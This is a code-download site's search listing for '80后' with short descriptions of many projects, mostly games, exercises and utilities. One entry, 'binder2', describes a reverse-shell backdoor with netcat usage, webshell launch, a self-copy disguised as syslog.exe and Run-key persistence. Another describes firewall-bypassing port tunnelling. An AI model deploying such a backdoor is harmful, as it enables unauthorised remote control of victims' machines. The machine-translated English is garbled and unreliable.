Welcome![Sign In][Sign Up]
Location:
Search - 80后

Search list

[Firewall-Security端口映射及TCP转发软件源代码

Description:

端口映射

PortTransfer_三种模式。
(1) PortTransfer Port Dest_IP Port
在运行本程序的计算机上监听Port端口,并将所有连接请求转到Dest_IP的Port去
(2) PortTransfer ctrlIP ctrlPort Dest_IP Port
和模式3配合用,程序将先主动连接ctrlIP:ctrlPort,之后所有在模式3的ServerPort端口的请求转到Dest_IP:Port去
(3) PortTransfer ctrlPort ServerPort
在执行模式2前先执行,将监听ctrlPort和ServerPort 端口,ctrlPort供模式2使用,ServerPort提供服务.

模式1适合在网关上运行,将内网IP的端口映射到网关上,
如:PortTransfer 88 192.168.0.110 80
那么网关将开启88端口,所有在88端口的请求将转到内网的192.168.0.110的80端口

模式2和模式3联合使用可以将内网的IP和端口映射到指定的IP和端口上,
一般在公网IP(假设61.1.1.1)上执行模式3,如:PortTransfer 99 80, 80是映射过来的端口
内网用户执行模式2如:PortTransfer 61.1.1.1 99 127.0.0.1 80,
那么程序在内网将先连接61.1.1.1:99建立个连接,并等待接收命令。

之后当61.1.1.1的80端口有请求,将通过99端口命令内网机子和公网机子建立条新的数据连接,
并将请求通过新建的连接将请求转发到内网机.

最后更新:2007.8.31 By DSSZ

最新更改了模3,接收到新连接接令后,不再创建新的临时端口,避免中转服务器有防火墙,临时端口连接不上的情况!
可参看 PortTransfer_3 的修改部分,在transport_old.cpp里面


Platform: | Size: 15570 | Author: testbs | Hits:

[Internet-Networkdwbbs6.0

Description: 1、为了界面的美观性考虑,建议您添加了作为分类的版面(或者有下属论坛的版面)后,到该版面的高级设置中设置该版面不允许发贴,当然你也可以设置他可以发贴:) 2、一个分类或者有下属论坛的版面,可以设置版主,如果其下级论坛设置了可继承上级版主权限,那么上级论坛就可以管理下级论坛,如果不继承,则不可管理下属版面 其他就没什么好注意的了,大家尽情享受新版带来的乐趣吧:) 目前新版加入功能: 前台: 1、无限分类,采用版主继承制度(可选,如可以不继承上级版主权限或者继承) 2、用户文件管理(面向用户的),制作中,完成进度80% 3、总固顶和提升帖子 4、帖子操作加上不对用户进行分值操作的快捷选项(可选),操作帖子后发短信给用户(可选) 5、用户组状态 6、审核帖子,有单独的批量审核页面,版主、管理员、有权限的用户可以不经过审核直接发贴 7、背景音乐(很古老的功能:P) 8、论坛展区和自选风格 9、估计还有我想不起来的,想起来再加,总的来说前台调整不大:) -1, in order to interface aesthetic considerations, we recommend you add a page classified as (or a subordinate Forum pages), the layout of the Advanced Settings and not sent to the space, of course, you can also set up can be sent to him :) 2, a classification or a subordinate Forum page, and can set moderator, if their subordinates set up a forum moderator authority derives from the higher level, the higher level forum on the management can lower the Forum, if not inherited, it would not be under the management of the layout on the other there was any attention, we enjoy the new version of the fun of it :) now join the new functions : prospects : an endless classifications, using moderator succession system (optional, and if we can not inherit higher authority or inheritance moderator) 2,
Platform: | Size: 1667288 | Author: oliver | Hits:

[Other resourceProjection_Gauss

Description: 用于测量与地图制图的高斯投影转换,提供了北京54、全国80、WGS84三个坐标系下的正算、反算。输出结果精确到小数点后7位。-for measuring and mapping the Gauss projection conversion, the Beijing 54, 80, 3 WGS84 coordinates the count is, anti-counting. Output accurate to seven decimal places.
Platform: | Size: 43621 | Author: 袁爽 | Hits:

[Firewall-Securitybinder2

Description: 简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd. 注意: 程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址10.24.9.100,端口7358. 程序会复制自身到c:\\winnt\\下名为syslog.exe,并在 HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run 下创建启动键. 如果需要卸载,请使用 binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.) 压缩包中含源码,建议按需更改代码后使用.-Profile : WEB penetration testing, we will always be the host ports are filtered, although the successful creation of a back door, but do not connect, then, the rebound in the back door-may be able to play on the point role. Usage : 1. The local machine monitoring a port : Netcat - vv-l-p 80 2. webShell or through any other running back door : binder2 80 youIPadd 3. listening to the local port intercepted from a remote host cmd. note : The process itself will create a self-starting method, in the absence of an order parameter, will connect the default IP and default port, the default exe is the IP address within the network address 10.24.9.100, port 7358. procedures will copy itself to C : \\ winnt \\ named syslog.exe and HKEY_CURRENT_USER \\ \\ Software \\ \\ Microsoft \\ \\ Windows \\ \\ CurrentVe
Platform: | Size: 12283 | Author: 张军 | Hits:

[CSharpwenbenbianji1

Description: 题目:文本编辑 一、需求分析 1、任务:输入一页文字,程序可以统计出文字、数字、空格的个数。 静态存储一页文章,每行最多不超过80个字符,共N行; 2、要求: (1)分别统计出其中英文字母数和空格数及整篇文章总字数; (2)统计某一字符串在文章中出现的次数,并输出该次数; (3)删除某一子串,并将后面的字符前移。 存储结构使用线性表,分别用几个子函数实现相应的功能; 3、输入数据的形式和范围:可以输入大写、小写的英文字母、任何数字及标点符号。 输出形式: (1) 分行输出用户输入的各行字符; (2) 分4行输出\"全部字母数\"、\"数字个数\"、\"空格个数\"、\"文章总字数\"; (3) 输出删除某一字符串后的文章; -topics : a text editor, a demand analysis, the task : the importation of a language that the procedure can be written out statistics, figures, the number of spaces. A static storage article, every trip up to more than 80 characters, a total of N; 2, requirements : (1) were the statistics on the English alphabet and the number of spaces and the number of the total number of words in the entire article; (2) a string statistics in the article, the frequency and the output frequency; (3) delete certain substrings. the characters will be behind advancing. The use of linear storage structure forms, few realize Functions corresponding function; 3, input data in the form and scope : the importation of capital and lowercase English letters, numbers and punctuation any. Output forms : (a) the output
Platform: | Size: 46006 | Author: 孙锋志 | Hits:

[JSP/JavaMISC_1.6_Provision_Java_API

Description: 中国移动MISC 1.6 Provision Java API 直接使用HttpServer的方式实现,不需要任何其它API,不需要Apache,IIS,Tomcat等Web服务器,直接实现底层. 运行环境 Windows/Linux JDK 1.4.2 演示程序 1) sync.bat 正向订购同步演示 java -classpath \"smsfan-provision.jar\" net.smsfan.provision.example.SyncOrderExample 80 provision 其中参数: 80 port,为HttpServer的端口号 provision serviceName,为服务名称 程序初始化成功后,misc网关访问URL:http://serverip:port/serviceName 即可提交正向同步数据 2) subs.bat 反向订购/取消接口演示 java -classpath \"smsfan-provision.jar\" net.smsfan.provision.example.SubscribeExample http://127.0.0.1/provision 其中参数: http://127.0.0.1/provision url,为Misc网关的反向订购/取消接口地址 -China Mobile MISC 1.6 Provision Java API used directly HttpS SP in a way that does not require any other APIs, not Apache, IIS, Tomcat Web server, etc., direct achieve bottom. Runtime Environment Windows / Linux JDK 1.4.2 Demonstration Program 1) sy nc.bat being ordered synchronous demo java-classpath "smsfan - prov ision.jar "net.smsfan.provision.example.S yncOrderExample 80 provision which parameters : 80 port, HttpServer to the port provision serviceName, for service names initialization procedure after the success of Gateway misc visit URL : http : / / serverip : port / serviceName forward will be submitted to two synchronous data) subs.bat reverse order / cancellation interface demo java-classpath "smsfan - provision.j ar "net.smsfan.provision.example.Subscrib eExa
Platform: | Size: 50546 | Author: 张宁 | Hits:

[OtherRMBCover

Description: 金额转换函数,比如1500099.80元转换大写后为一百五十万九十九元八角整
Platform: | Size: 2345 | Author: 曾世尧 | Hits:

[OtherFortranreadwrite

Description: 用于Fortran顺序读写文件,比如有如下数据,其存放格式: 11 10 15 19 30 50 70 80 第一次调用前两行, 第二次调用后两行. 改动后可以进行读入,或者写进
Platform: | Size: 977 | Author: ala | Hits:

[Other1

Description: 静态存储一页文章,每行最多不超过80个字符,共N行; 1)分别统计出其中英文字母数和空格数及整篇文章总字数; 2)统计某一字符串在文章中出现的次数,并输出该次数; 3)删除某一子串,并将后面的字符前移; 4)用指定的字符串替换某一子串; 5)存储结构使用线性表,分别用几个子函数实现相应的功能; 6)输入数据的形式和范围:可以输入大写、小写的英文字母、任何数字及标点符号。 7)输出形式:①分行输出用户输入的各行字符;②分4行输出\"全部字母数\"、\"数字个数\"、\"空格个数\"、\"文章总字数\";③输出删除某一字符串后的文章;④输出替换某一字符串后的文章。
Platform: | Size: 2351 | Author: liujing | Hits:

[JSP/Java三维 Tag Cloud

Description: $(document).ready(function(){ //计算样式中心值 a横向中心点,b纵向log中心点 //cloud-carousel.1.0.5.js 文件中去掉了IE的倒影滤镜。FF支持得更好。 var e = 150; var a = $("#da-vinci-carousel").width() / 2; var c = $("#da-vinci-carousel").height() / 2; var b = Math.log(c) * (e / 10); $('#but1').css({top:(c / 2) - ($('#but1').height() / 2),left:70,zIndex:9999}); $('#but2').css({top:(c / 2) - ($('#but2').height() / 2),right:70,zIndex:9999}); $("#da-vinci-carousel").CloudCarousel( { minScale:0.25,//视线轴距 越大远处视觉越近 reflHeight: 40, //倒影透明度 reflGap:-2, //倒影距离 //titleBox: $('#da-vinci-title'), //altBox: $('#da-vinci-alt'), buttonLeft: $('#but1'), buttonRight: $('#but2'), yRadius:e, //Y轴距 调整轴距需要给DIV增加高度 xPos: a, //距离左侧边距 yPos: b, //距离顶部边距 speed:0.09, //滚动速度 mouseWheel:true //是否支持鼠标滚轴 }); $("#da-vinci-carousel img").css("border",0); //消除当前效果DIV中的img边框 });
Platform: | Size: 380630 | Author: qp3db@163.com | Hits:

[Other Riddle gameseluosi

Description: 用TC做的一款老掉牙的游戏,80后的人对此游戏都情由独衷!-TC make use of an old game, 80 people after the Games are automatically this operation alone!
Platform: | Size: 55296 | Author: 刘俊杰 | Hits:

[Software Engineering80

Description: 80后在校大学生完成电子设计全过程 80后在校大学生完成电子设计全过程[TINA7opa4131 opa228 TL082] 技术分类: 模拟设计 | 2009-01-07作者:billyevans: EDN China   EDN博客精华文章 作者:billyevans   一、前言   作为一名在读本科生,自己不能奢望从课堂上学到太多实践的知识。但我还是看到身边有很多热衷于电子设计的同学,虽然自己在电子线路设计的学习过程中一路磕磕绊绊,但一直有很多热心的学长老师帮助,在这个过程中自己也总结了一些学习方法,希望能给热爱电子线路设计的同学们一点点启发。-80 college students after the completion of the whole process of electronic design. Wps
Platform: | Size: 1081344 | Author: ccg | Hits:

[FlashMX80childhood

Description: 80后回忆影片介绍的flash源文件,直接导出就可以运行,对一些要做80后东西的朋友们比较有帮助吧,希望大家能做的更好~-Introduced after 80 flash memory video source file can be exported directly to run after a number of things to do 80 more friends to help it, I hope we can do better ~
Platform: | Size: 8596480 | Author: oneyear | Hits:

[Other GamesBattleCity

Description: 坦克大战完全版源程序,相信80后的朋友都玩过。很经典的一个手机游戏-Just for your learning purpose. battle city is a moderate complexcity j2me game, if you want to learn how to write game on j2me platfrom ,write your own verion of battle city
Platform: | Size: 610304 | Author: lions | Hits:

[Game Server SimulatorNES

Description: 任天堂红白机NES是经典的游戏机,许多80后都记忆忧新,有上千款的ROM游戏,这个是NES模拟器小内存版,短小精干,只有区区二十多个主文件,运行起来一点不赖,虽然目前还不支持声音及几个ROM但对需要的您有很大启发继续改进完善,VC++8下编译通过-Nintendo NES is a classic NES game, and many worry about the memory 80 are new, there are thousands of models of ROM game, this is a small memory version of the NES emulator, lean, mean, only a few more than twenty master file, run up some bad, some game shows included ROM, the other can be found online, VC++7 compiled by
Platform: | Size: 404480 | Author: | Hits:

[androidJunQi

Description: 80后小时候玩过的陆战棋,军旗源码。欢迎下载。-Child played 80 the Land Warfare chess, the Etendard source. Welcome to download.
Platform: | Size: 881664 | Author: | Hits:

[Linux-Unixtank

Description: 基于SDL图形库的坦克游戏。 80后怀旧都游戏哦!-Based on the graphics library SDL tanks game
Platform: | Size: 286720 | Author: 雷翔 | Hits:

[Game ProgramTetris

Description: 80后小时候玩的方块躲飞机游戏,可以设置游戏难度-the hiding plane game was very interesting to the children borned after 1980
Platform: | Size: 86016 | Author: lufei | Hits:

[Web ServerCassettePlayer

Description: 相信80后之前的人都知道磁带,它是一个时代的符号,但是现在已经被MP3和电脑给完全替代了。而今天我要给大家推荐的就是一款模拟磁带的html5播放器,能用到这款音频播放器真的是挺让人兴奋的。相信这一定会勾起你很多美好的回忆。-I believe before 80 knows the tape, it is the symbol of an era, but is now MP3 and PC to completely replace. Today I m going to recommend is an analog tape html5 player, audio player can be used to this is really quite exciting. I believe this will remind you a lot of good memories.
Platform: | Size: 6678528 | Author: 段于 | Hits:

[Game Program风云II (清华仿写版)

Description: MUD游戏 80后的经典 MUD 80后的经典(Classics after MUD 80 Classics after MUD 80)
Platform: | Size: 3278848 | Author: 不冷Gg | Hits:
« 12 3 4 5 6 7 »

CodeBus www.codebus.net